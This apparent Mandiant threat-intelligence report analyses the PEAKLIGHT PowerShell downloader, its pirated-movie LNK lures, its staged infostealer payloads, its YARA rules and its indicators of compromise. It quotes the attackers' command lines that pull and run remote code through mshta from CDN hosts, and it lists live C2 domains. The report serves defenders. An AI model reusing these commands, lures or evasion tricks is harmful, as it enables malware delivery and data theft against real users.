Loading...

PEAKLIGHT: Decoding the Stealthy Memory-Only Malware

Written by: Aaron Lee, Praveeth DSouza

TL;DR

Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.

Overview

Mandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service infostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2 (LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a Microsoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the host. Mandiant named this final downloader PEAKLIGHT.

Figure 1: Infection chain

Infection Chain

Stage 1: Movie Lures; A Blast from the Past 

In recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies. These archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in Figure 2:

* Video_mp4_1080p_x264.zip -> The Movie (HD).lnk
* Video_mp4_[1080p].zip -> Full Movie 1080p HD.lnk
* @!Movie_HD_1080p_mp4_@!.zip -> Full Movie HD (1080p).lnk
* mp4_Full_Video_HD_1080p@!.zip -> Full Video (HD) mp4.lnk

Figure 2: Initial infection

During an associated investigation within a client environment, Mandiant identified anomalous outbound network activity to the IP address 62.133.61[.]56. The XML page seen in Figure 3 was subsequently discovered at the URL hxxp://62.133.61[.]56/Downloads.

Figure 3: XML markup

Of particular interest was this snippet from the XML markup, seen in Figure 4.

<D:href>/Downloads/Full%20Video%20HD%20%281080p%29.lnk</D:href>
<D:propstat>
<D:prop>
<D:resourcetype></D:resourcetype>
<D:displayname>Full Video HD (1080p).lnk</D:displayname>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
<D:getetag>”17d6b3e5205a12a0460″</D:getetag>
<D:getcontentlength>1120</D:getcontentlength>
<D:getlastmodified>Fri, 07 Jun 2024 11:01:44 GMT</D:getlastmodified>
<D:supportedlock>

Figure 4: Forwarding mechanism

Based on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL hxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999). Mandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon (Figure 5).

Figure 5: LNK file configured with a media file icon

LNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing malware. These files can be disguised as legitimate documents or programs, making them effective for hiding in plain sight.

At this stage in the investigation, Mandiant identified different command variations within the parameters of the LNK file.

Variation 1

The parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to search for the file win.ini and execute a PowerShell script. Mandiant observed the execution of the following command (Figure 6):

forfiles.exe /p C:Windows /m win.ini /c “powershell .
mshta https://nextomax.b-cdn[.]net/nexto”

Figure 6: Initial PowerShell script variation 1

This command:

Uses the /p command switch for forfiles.exe to set the designated file search path to C:Windows.

Uses the /m command switch to look for files matching the name win.ini. Then, for each match (though on typical Windows installations there will only be one):

Starts powershell.exe with configurations to load a localized or dot-sourced script, which is signified by the “.” (in this case, the output generated by the rest of the command-line parameters).

Retrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.

Executes the retrieved payload via mshta.exe.

After executing this LNK file, Windows Media Player was opened on the affected host, and a video of a prominent film studio’s opening logo reel played automatically.

This video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably served as a “cover” video to attempt to alleviate suspicions that the affected host had, in reality, been infected with malware.

Variation 2

In a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell command that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved from a remote server.

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe”
.(gp -pa ‘HKLM:SOF*Clas*Applicationsmsh*e’).
(‘PSChildName’)hxxps://potexo.b-cdn[.]net/potexo

Figure 7: Initial PowerShell script variation 2

This command:

Runs a script signified by the dot sourcing operator “.“.

Uses the Get-ItemProperty (gp) to point to the Mshta registry hive and psChildName to specify the object, mshta.exe.

Retrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via mshta.exe.

The attackers employed the following evasion techniques to further cover their tracks:

System Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from a remote server, bypassing application control solutions and browser security settings. 

Content Delivery Network Abuse: The attackers took advantage of a reputable content delivery network (Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to circumvent security filters that might not scrutinize traffic from known, trusted sources.

Both variations utilize MITRE ATT&CK® Technique T1218.005: System Binary Proxy Execution: Mshta.

Stage 2: JavaScript Dropper

Figure 8 shows analysis of the HTML file cached on the CDN contained an obfuscated memory-only JavaScript dropper.

Figure 8: JavaScript dropper layer 1

The script begins by assigning decimal-encoded ASCII characters to randomly named variables. The String.fromCharCode() function is then used to convert the decimal-encoded characters back into their corresponding ASCII characters to decode the JavaScript dropper embedded within the script.

Mandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.

Figure 9: JavaScript dropper layer 2

The script in Figure 9 carries out the following actions:

1. Decoding Function (wAJ)

The function receives an array of numbers, decodes each by subtracting 619, and then converts the result to its corresponding character using String.fromCharCode(). These characters are then combined to produce the final, decoded string, which is returned by the function.

2. Payload (KbX, YmD)

The variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.

3. ActiveXObject

The script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX object. This object grants the script system-level privileges to execute commands.

4. IMD.Run

Executes the decoded KbX command.

Parameters:

0: This parameter instructs the command to run in a hidden window, keeping its actions concealed from the user.

true: This parameter ensures the script waits for the command to complete its execution before moving on to any subsequent steps.

The payload (KbX) was abbreviated to maintain a concise presentation.

Note: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.

Variation 1: Hex-Encoded Payload

Figure 10: PowerShell hex-encoded payload

The first command conceals its malicious payload within a string of hexadecimal characters. The execution process adheres to the following sequence:

Stealthy PowerShell Launch: The command initiates PowerShell in a hidden window (-w 1), bypasses execution restrictions (-ep Unrestricted), and skips loading user profiles (-nop), ensuring covert operations.

Hex to Byte Conversion: A custom function (ffQiHkvB) is defined to transform the hexadecimal string into a byte array, a standard format for storing data.

Decryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key. The byte array is decrypted, revealing the actual PowerShell code.

Execution: Finally, the decrypted PowerShell code is executed.

Note: Mandiant decoded the payload using a custom CyberChef recipe.

Variation 2: Base64-Encoded Payload

Figure 11: PowerShell Base64-encoded payload

The second command follows a similar structure but with key differences: the malicious payload is encoded using Base64 instead of hexadecimal and is executed through a memory stream.

Stealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the same as in Variation 1.

Base64 Decoding: Instead of a custom function, this variant directly uses PowerShell’s built-in FromBase64String method to decode the payload. 

Decryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a Base64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing the PowerShell code, which is subsequently executed.

Stage 3: PEAKLIGHT; The PowerShell Downloader

PEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded filenames and downloads files from a remote CDN if the files are not present. 

During our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT script:

Target Directory

Variation 1 downloads files to $env:AppData.
Variation 2 downloads files to $env:ProgramData.

Execution Logic: 

Variation 1 executes the first alphabetically sorted file in the archive. 
Variation 2 executes the first file found in the archive.

File Name: 

Variation 1 downloads files as L1.zip and L2.zip.
Variation 2 downloads files as K1.zip and K2.zip

Additional Actions

Variation 1 also downloads an image (video.mp4) and makes a request to a remote server. 
Variation 2 does not download an image file.

Note: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.

Variation 1

Figure 12: PEAKLIGHT variation 1

This PEAKLIGHT downloader is designed to execute the following tasks:

znY: Writes data to a file.

nbF: Extracts a ZIP archive and runs the first executable file inside.

aXR: Downloads data from an obfuscated URL.

jkg: Deobfuscates a string.

Main Function (AsD)

Video Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays the video. If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData folder, and then plays it.

Image Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png using Invoke-WebRequest.

ZIP File Handling:

It checks if L1.zip exists in the AppData folder.

If it exists, it extracts its contents to the AppData folder and runs the first executable file found within the ZIP.

If not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its contents, and runs the first executable.

It repeats the same process for L2.zip.

Analysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:

https://nextomax.b-cdn[.]net/video.mp4

https://nextomax.b-cdn[.]net/L1.zip

https://nextomax.b-cdn[.]net/L2.zip

https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png 

Variation 2

Figure 13: PEAKLIGHT variation 2

This PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.

The functions:

qXF($EGa, $aQU): The purpose of this function is to write data to a file.
Irl($EGa): Extracts a ZIP archive and runs an executable from it.
OBs($BYu):  Downloads data from a URL.
Fzl($XFW): Deobfuscates an array of numbers into a string (likely a URL).

Main Execution (bSo function):

Defines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.

For each of these ZIP files, it checks if they already exist.

If the file exists, it simply unzips it using the Irl function.

If the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the ZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function Irl.

Analysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:

https://potexo.b-cdn[.]net/K1.zip

https://potexo.b-cdn[.]net/K2.zip

Additionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains hosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.

Stage 4: The Final Payload

Variation 1: L1.zip and L2.zip

Having explored the initial stages of the PEAKLIGHT downloader’s operation, our focus now shifts to the payload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three specific files: L1.zip, L2.zip, and video.mp4. Mandiant successfully acquired and extracted the contents of the files, as seen in Table 1.

Download

Extracted Content

Filename: L2.zip

Hash: 307f40ebc6d8a207455c96d34759f1f3

Type: Archive

Filename: Setup.exe

Hash: d8e21ac76b228ec144217d1e85df2693

Type: Win32 EXE

Filename: L1.zip

Hash: a6c4d2072961e9a8c98712c46be588f8

Type: Archive

Filename: LiteSkinUtils.dll

Hash: 059d94e8944eca4056e92d60f7044f14

Type: Win32 DLL

Filename: Bentonite.cfg

Hash: e7c43dc3ec4360374043b872f934ec9e

Type: PNG

Filename: Video.mp4

Hash: 91423dd4f34f759aaf82aa73fa202120

Type: Video

 

Table 1: Variant 1 downloaded files and extracted archive content

L2.zip contained the following:

Setup.exe: This executable is a variant of the Cryptbot infostealer. Our analysis uncovered the following embedded URLs:

https://brewdogebar[.]com/code.vue
http://gceight8vt[.]top/upload.php

L1.zip contained the following:

bentonite.cfg: This file contains malware configurations that are linked to the SHADOWLADDER malware family.
LiteSkinUtils.dll: It is a malicious component used by SHADOWLADDER malware to facilitate the execution of its second-stage payload through dynamic-link library (DLL) side-loading.

Video.mp4

This file appears to be a legitimate movie trailer, likely used as a decoy to deceive the victim into believing that the downloaded files are safe.

Variation 2: K1.zip and K2.zip

The second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed downloading two archives: K1.zip and K2.zip.

Download

Extracted Content

Filename: K1.zip

Hash: b6b8164feca728db02e6b636162a2960

Type: Archive

Filename: toughie.txt

Hash: dfdc331e575dae6660d6ed3c03d214bd

Type: data

Filename: Aaaa.exe

Hash: b15bac961f62448c872e1dc6d3931016

Type: Win32 EXE

Filename: WCLDll.dll

Hash: 47eee41b822d953c47434377006e01fe

Type: Win32 DLL

Filename: C:UsersuserAppDataLocalTemperefgojgbu

Hash: d6ea5dcdb2f88a65399f87809f43f83c

Type: Win32 EXE

 

Filename: K2.zip

Hash: 236c709bbcb92aa30b7e67705ef7f55a

Type: Archive

Filename: Jfts.exe

Hash: b15bac961f62448c872e1dc6d3931016

Type: Win32 EXE

Table 2: Variant 2 downloaded files and extracted archive content

K1.zip contained the following:

toughie.txt: This file contained configurations related to the SHADOWLADDER malware.
aaaa.exe & WCLDll.dll: These binaries are DLL files that SHADOWLADDER patches to leverage their HTTP download functionality.

K2.zip contained the following:

Jfts.exe: This file is a renamed copy of the previously mentioned aaaa.exe.

Upon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. This DLL then leverages the “More Utility” (more.com) to stealthily drop two additional files:

AppDataLocalTempHofla.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3.exe binary.
AppDataLocalTemperefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c): Further analysis of this files confirmed their association with the CRYPTBOT.AUTOIT malware.

Variation 3: Additional PEAKLIGHT Variant

Further analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This variant retrieves its payload,the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed breakdown of the contents within these archives is presented in Table 3.

Download

Extracted Content

Filename: K1.zip

Hash: bb9641e3035ae8c0ab6117ecc82b65a1

Type: Archive

Filename: cymophane.doc

Hash: f98e0d9599d40ed032ff16de242987ca

Type: ISO

Filename: WebView2Loader.dll

Hash: 58c4ba9385139785e9700898cb097538

Type: Win32 DLL

Filename: K2.zip

Hash: d7aff07e7cd20a5419f2411f6330f530

Type: Archive

Filename: hgjke.exe

Hash: c047ae13fc1e25bc494b17ca10aa179e

Type: Win32 EXE

Filename: AppDataLocalTempoqnhustu

Hash: 43939986a671821203bf9b6ba52a51b4

Type: Win32 EXE

 

Table 3: Variant 3 downloaded files and extracted archive content

K1.zip contained the following:

cymophane.doc: This file contained configurations related to the SHADOWLADDER malware.
WebView2Loader.dll: This malicious DLL was observed to be dropped by the LummaC.V2 infostealer.

K2.zip contained the following:

Hgjke.exe: Identified as a renamed copy of the legitimate “JRiver Web Application” executable. During dynamic analysis, hgjke.exe was observed loading the malicious WebView2Loader.dll. Mandiant observed hgjke.exe utilize the comp.exe utility to drop two additional files:

AppDataLocalTempUfa.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3 binary.
AppDataLocalTempoqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4): Further analysis confirmed this file to be consistent with the LummaC.V2 payload.

Conclusion

PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was observed downloading payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT. The malware developers used several different obfuscation and evasion techniques, including system binary proxy execution and CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own unique characteristics.

We encourage security researchers to remain vigilant and share any insights or similar malware samples they encounter. By working together and fostering open communication within the cybersecurity community, we can better understand the evolving threat landscape and strengthen our collective defenses against future attacks.

Protect and scan your environment against the indicators of compromise and YARA rules in the following section. If you suspect that your environment may have been compromised, contact our Incident Response team for assistance.

Acknowledgements

We would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond Leong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable feedback.

Detections

Yara Rules

rule M_AES_Encrypted_payload {
meta:
author = “Mandiant”
description = “This rule is desgined to detect on events that
exhibits indicators of utilizing AES encryption for payload obfuscation.”
target_entity = “Process”
strings:
$a = /($w+.Key(s|)=((s|)(w+|));|$w+.Key(s|)=(s|)w+(‘w+’);)/
$b = /$w+.IV/
$c = /System.Security.Cryptography.(AesManaged|Aes)/
condition:
all of them
}
rule M_Downloader_PEAKLIGHT_1 {
meta:
mandiant_rule_id = “e0abae27-0816-446f-9475-1987ccbb1bc0”
author = Mandiant
category = “Malware”
description = “This rule is designed to detect on events related to peaklight.
PEAKLIGHT is an obfuscated PowerShell-based downloader which checks for
the presence of hard-coded filenames and downloads files from a remote CDN
if the files are not present.”
family = “Peaklight”
platform = “Windows”
strings:
$str1 = /functions{1,16}w{1,32}($w{1,32},s{1,4}$w{1,32})
{[IO.File]::WriteAllBytes($w{1,32},s{1,4}$w{1,32})}/ ascii wide
$str2 = /Expand-Archives{1,16}-Paths{1,16}$w{1,32}
s{1,16}-DestinationPath/ ascii wide
$str3 = /(w{1,32}s{1,4}@((d{3,6},){3,12}/ ascii wide
$str4 = “.DownloadData(” ascii wide
$str5 = “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12” ascii wide
$str6 = /.EndsWith((([“‘].zip[“‘])|((w{1,32}s{1,16}@((d{3,6},){3}d{3,6}))))/ ascii wide
$str7 = “Add -Type -Assembly System.IO.Compression.FileSystem” ascii wide
$str8 = “[IO.Compression.ZipFile]::OpenRead”
condition:
4 of them and filesize < 10KB
}

Indicators of Compromise (IOCs)

Network-Based IOCs

PEAKLIGHT NBIs:
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
hxxps://potexo.b-cdn[.]net/potexo

LUMMAC.V2 C2s:
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
detailbaconroollyws[.]shop
messtimetabledkolvk[.]shop
considerrycurrentyws[.]shop
understanndtytonyguw[.]shop
patternapplauderw[.]shop
horsedwollfedrwos[.]shop
tropicalironexpressiw[.]shop

CRYPTBOT C2s:
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue

SHADOWLADDER:
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://fatodex.b-cdn[.]net/K1.zip
hxxps://fatodex.b-cdn[.]net/K2.zip
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
hxxps://matodown.b-cdn[.]net/K1.zip
hxxps://matodown.b-cdn[.]net/K2.zip
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://nextomax.b-cdn[.]net/L2.zip
hxxps://potexo.b-cdn[.]net/K1.zip
hxxps://potexo.b-cdn[.]net/K2.zip

Host-Based IOCs

CRYPTBOT:
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)

LUMMAC.V2:
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)

PEAKLIGHT:
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)

SHADOWLADDER:
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)
K1.zip (MD5: b6b8164feca728db02e6b636162a2960)
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)

Leave a Reply

Your email address will not be published. Required fields are marked *